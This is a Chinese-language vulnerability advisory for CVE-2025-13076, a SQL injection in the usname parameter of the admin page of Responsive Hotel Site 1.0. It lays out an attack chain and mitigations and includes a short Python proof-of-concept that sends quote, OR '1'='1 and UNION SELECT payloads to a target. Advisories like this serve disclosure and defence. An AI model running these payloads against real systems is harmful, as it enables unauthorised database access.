CVE-2025-13076 code-projects Responsive Hotel Site 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13076

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Responsive Hotel Site 1.0

漏洞概述

CVE-2025-13076是code-projects平台开发的Responsive Hotel Site 1.0版本中存在的一个中等严重性安全漏洞。该漏洞位于管理后台的usersetting.php文件中，攻击者可以通过操纵usname参数实现SQL注入攻击。由于该参数在SQL查询中未经过充分的安全过滤和参数化处理，恶意用户可以注入任意SQL代码，从而可能导致数据库敏感信息泄露、数据库内容篡改或服务器完全沦陷。此漏洞的CVSS评分为4.7，属于中等严重级别。攻击向量为网络可远程利用，但需要高权限认证（PR:H），无需用户交互（UI:N）。漏洞影响系统的机密性、完整性和可用性均为低级别影响。鉴于该漏洞的利用代码已公开，建议受影响用户尽快采取修复措施。

技术细节

该SQL注入漏洞存在于/admin/usersetting.php文件中的usname参数。攻击者可以通过HTTP请求向该参数注入恶意SQL语句。由于应用程序未对用户输入进行适当的输入验证和参数化查询，攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。典型的攻击Payload可能包含：单引号用于触发SQL语法错误，UNION SELECT语句用于联合查询，以及条件判断语句用于盲注测试。攻击者可能获取的管理后台凭据、用户个人信息、酒店预订数据等敏感信息。漏洞的认证要求为高权限，意味着攻击者需要具备管理后台的访问权限才能利用此漏洞，但一旦获得初始访问权限，攻击者可以通过SQL注入进一步提升权限或获取更多敏感数据。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的/admin/usersetting.php管理后台页面

STEP 2

步骤2

攻击者需要获取管理后台的高权限账户凭据或通过其他漏洞获取初始访问权限

STEP 3

步骤3

攻击者构造恶意SQL注入Payload，通过usname参数提交到usersetting.php文件

STEP 4

步骤4

应用程序将恶意Payload拼接到SQL查询语句中，未经充分过滤和参数化处理

STEP 5

步骤5

数据库执行恶意SQL语句，攻击者成功注入并执行自定义SQL命令

STEP 6

步骤6

攻击者利用SQL注入获取数据库中的敏感信息，如管理员密码、用户数据等

STEP 7

步骤7

攻击者可能通过SQL注入进一步实现远程代码执行或完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13076 SQL Injection PoC
# Target: code-projects Responsive Hotel Site 1.0
# File: /admin/usersetting.php
# Parameter: usname

def exploit_sqli(target_url, payload):
    """Exploit SQL injection in usname parameter"""
    target = target_url.rstrip('/') + '/admin/usersetting.php'
    
    # SQL injection payload for testing
    # Basic test payload to trigger SQL error
    data = {
        'usname': payload
    }
    
    try:
        response = requests.post(target, data=data, timeout=10)
        print(f'[+] Request sent to: {target}')
        print(f'[+] Payload: {payload}')
        print(f'[+] Status Code: {response.status_code}')
        
        # Check for SQL error indicators
        if 'sql' in response.text.lower() or 'mysql' in response.text.lower() or 'syntax' in response.text.lower():
            print('[+] SQL error detected - vulnerability confirmed')
            return True
        return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-13076_poc.py <target_url>')
        sys.exit(1)
    
    target_url = sys.argv[1]
    
    # Test payloads
    payloads = [
        "'",  # Single quote to trigger SQL error
        "admin' OR '1'='1",  # Basic SQL injection test
        "admin' UNION SELECT 1,2,3---",  # UNION-based injection test
    ]
    
    print('[+] CVE-2025-13076 SQL Injection PoC')
    print('[+] Target: Responsive Hotel Site 1.0')
    print('='*50)
    
    for payload in payloads:
        exploit_sqli(target_url, payload)
        print('-'*50)

影响范围

code-projects Responsive Hotel Site 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 在Web应用防火墙中配置SQL注入防护规则，拦截包含可疑SQL关键字的请求；2) 对/admin/usersetting.php文件的usname参数实施严格的输入验证，禁止单引号、分号、UNION等特殊字符；3) 限制管理后台的访问来源，仅允许受信任的IP地址访问；4) 监控数据库查询日志，及时发现异常SQL执行行为；5) 考虑暂时禁用受影响的管理功能，待官方发布安全补丁后再恢复使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13076
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13076
3 Details https://www.cvedetails.com/cve/CVE-2025-13076/
4 VulDB https://vuldb.com/cve/CVE-2025-13076
5 Link https://code-projects.org/
6 Link https://github.com/zhizi1234/cve/blob/main/tmp70/report.md
7 Link https://vuldb.com/?ctiid.332207
8 Link https://vuldb.com/?id.332207
9 Link https://vuldb.com/?submit.682867
10 Link https://github.com/zhizi1234/cve/blob/main/tmp70/report.md